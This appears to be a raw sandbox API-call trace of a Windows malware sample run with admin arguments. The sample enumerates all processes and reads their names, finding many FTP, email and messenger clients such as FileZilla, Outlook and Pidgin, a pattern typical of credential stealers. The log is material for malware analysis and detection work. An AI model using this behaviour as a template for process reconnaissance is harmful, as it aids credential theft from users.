lpString1=0x18ec68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0072.172] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0072.172] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0072.180] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0072.180] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18df74 | out: pNumArgs=0x18df74) returned 0x3141908*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0072.181] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0072.181] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0072.182] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0072.182] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0072.183] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0072.183] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0072.235] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0072.235] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0072.235] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0072.235] EnumProcesses (in: lpidProcess=0x183770, cb=0xa000, lpcbNeeded=0x18df80 | out: lpidProcess=0x183770, lpcbNeeded=0x18df80) returned 1 [0072.240] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0072.240] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0072.241] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0072.242] CloseHandle (hObject=0x0) returned 0 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5a4 [0072.242] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0072.242] CloseHandle (hObject=0x5a4) returned 1 [0072.242] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a4 [0072.243] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0072.243] CloseHandle (hObject=0x5a4) returned 1 [0072.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0072.243] CloseHandle (hObject=0x0) returned 0 [0072.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5a4 [0072.243] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0072.243] CloseHandle (hObject=0x5a4) returned 1 [0072.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0072.243] CloseHandle (hObject=0x0) returned 0 [0072.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5a4 [0072.243] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0072.244] CloseHandle (hObject=0x5a4) returned 1 [0072.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0072.244] CloseHandle (hObject=0x0) returned 0 [0072.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0072.244] CloseHandle (hObject=0x0) returned 0 [0072.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0072.244] CloseHandle (hObject=0x0) returned 0 [0072.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0072.244] CloseHandle (hObject=0x0) returned 0 [0072.244] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5a4 [0072.244] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.246] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xc30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="carnival_surprising_ii.exe") returned 0x1a [0072.246] CloseHandle (hObject=0x5a4) returned 1 [0072.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x5a4 [0072.246] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.248] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="humor jordan.exe") returned 0x10 [0072.248] CloseHandle (hObject=0x5a4) returned 1 [0072.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x5a4 [0072.248] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.250] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x960000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="weapon.exe") returned 0xa [0072.250] CloseHandle (hObject=0x5a4) returned 1 [0072.250] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x684) returned 0x5a4 [0072.250] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.252] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x850000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="culture.exe") returned 0xb [0072.252] CloseHandle (hObject=0x5a4) returned 1 [0072.252] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5a4 [0072.252] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.253] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x190000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="h produces routers.exe") returned 0x16 [0072.254] CloseHandle (hObject=0x5a4) returned 1 [0072.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x290) returned 0x5a4 [0072.254] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.255] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1000000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="hacameras.exe") returned 0xd [0072.256] CloseHandle (hObject=0x5a4) returned 1 [0072.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x5a4 [0072.256] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.258] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8b0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fraud.exe") returned 0x9 [0072.258] CloseHandle (hObject=0x5a4) returned 1 [0072.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x34c) returned 0x5a4 [0072.258] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.259] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xf30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="chinaassumedtalent.exe") returned 0x16 [0072.259] CloseHandle (hObject=0x5a4) returned 1 [0072.259] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6d4) returned 0x5a4 [0072.260] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.261] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd70000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="assessed.exe") returned 0xc [0072.261] CloseHandle (hObject=0x5a4) returned 1 [0072.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a4 [0072.261] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.262] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1250000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="thanksgiving.exe") returned 0x10 [0072.263] CloseHandle (hObject=0x5a4) returned 1 [0072.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x5a4 [0072.263] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.264] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x220000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="madagascar_fault_blades.exe") returned 0x1b [0072.264] CloseHandle (hObject=0x5a4) returned 1 [0072.264] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x5a4 [0072.264] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.266] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x350000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="manufacturing pharmacology forge.exe") returned 0x24 [0072.266] CloseHandle (hObject=0x5a4) returned 1 [0072.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5a4 [0072.266] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.268] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe00000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="boards.exe") returned 0xa [0072.268] CloseHandle (hObject=0x5a4) returned 1 [0072.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5a4 [0072.268] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.270] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x60000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="lack-shadow.exe") returned 0xf [0072.270] CloseHandle (hObject=0x5a4) returned 1 [0072.270] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5a4 [0072.270] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.272] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x910000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="flood_suspension.exe") returned 0x14 [0072.272] CloseHandle (hObject=0x5a4) returned 1 [0072.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5a4 [0072.272] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.273] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="henderson.exe") returned 0xd [0072.274] CloseHandle (hObject=0x5a4) returned 1 [0072.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5a4 [0072.274] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.275] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="switzerland.exe") returned 0xf [0072.276] CloseHandle (hObject=0x5a4) returned 1 [0072.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5a4 [0072.276] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.277] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="advertisers_palmer.exe") returned 0x16 [0072.278] CloseHandle (hObject=0x5a4) returned 1 [0072.278] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5a4 [0072.278] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.279] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="itself-profit.exe") returned 0x11 [0072.280] CloseHandle (hObject=0x5a4) returned 1 [0072.280] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x5a4 [0072.280] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.281] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x930000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0072.282] CloseHandle (hObject=0x5a4) returned 1 [0072.282] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5a4 [0072.282] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.283] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe90000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0072.284] CloseHandle (hObject=0x5a4) returned 1 [0072.284] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5a4 [0072.284] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.285] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xcc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0072.286] CloseHandle (hObject=0x5a4) returned 1 [0072.286] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5a4 [0072.286] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.287] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0072.288] CloseHandle (hObject=0x5a4) returned 1 [0072.288] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5a4 [0072.288] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.289] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11c0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0072.290] CloseHandle (hObject=0x5a4) returned 1 [0072.290] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5a4 [0072.290] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.291] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0072.292] CloseHandle (hObject=0x5a4) returned 1 [0072.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5a4 [0072.292] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.294] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x150000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0072.294] CloseHandle (hObject=0x5a4) returned 1 [0072.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5a4 [0072.294] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.296] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa00000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0072.296] CloseHandle (hObject=0x5a4) returned 1 [0072.296] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5a4 [0072.296] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.298] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10d0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0072.298] CloseHandle (hObject=0x5a4) returned 1 [0072.298] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5a4 [0072.298] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.300] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0072.300] CloseHandle (hObject=0x5a4) returned 1 [0072.300] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5a4 [0072.300] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.302] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0072.302] CloseHandle (hObject=0x5a4) returned 1 [0072.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5a4 [0072.302] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.304] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xbe0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0072.304] CloseHandle (hObject=0x5a4) returned 1 [0072.304] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5a4 [0072.304] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.305] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x390000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0072.306] CloseHandle (hObject=0x5a4) returned 1 [0072.306] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x5a4 [0072.306] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.308] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x840000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0072.308] CloseHandle (hObject=0x5a4) returned 1 [0072.308] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5a4 [0072.308] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.310] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe20000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0072.310] CloseHandle (hObject=0x5a4) returned 1 [0072.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5a4 [0072.310] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.312] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11c0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0072.312] CloseHandle (hObject=0x5a4) returned 1 [0072.313] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x5a4 [0072.313] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.314] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0072.315] CloseHandle (hObject=0x5a4) returned 1 [0072.315] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x5a4 [0072.315] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.317] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xbb0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0072.317] CloseHandle (hObject=0x5a4) returned 1 [0072.317] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9cc) returned 0x5a4 [0072.317] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.319] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x130000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0072.320] CloseHandle (hObject=0x5a4) returned 1 [0072.320] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x5a4 [0072.320] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.322] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x40000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0072.322] CloseHandle (hObject=0x5a4) returned 1 [0072.322] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x5a4 [0072.322] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0072.324] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xee0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0072.325] CloseHandle (hObject=0x5a4) returned 1 [0072.325] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9fc) returned 0x5a4 [0072.325] EnumProcessModules (in: hProcess=0x5a4, 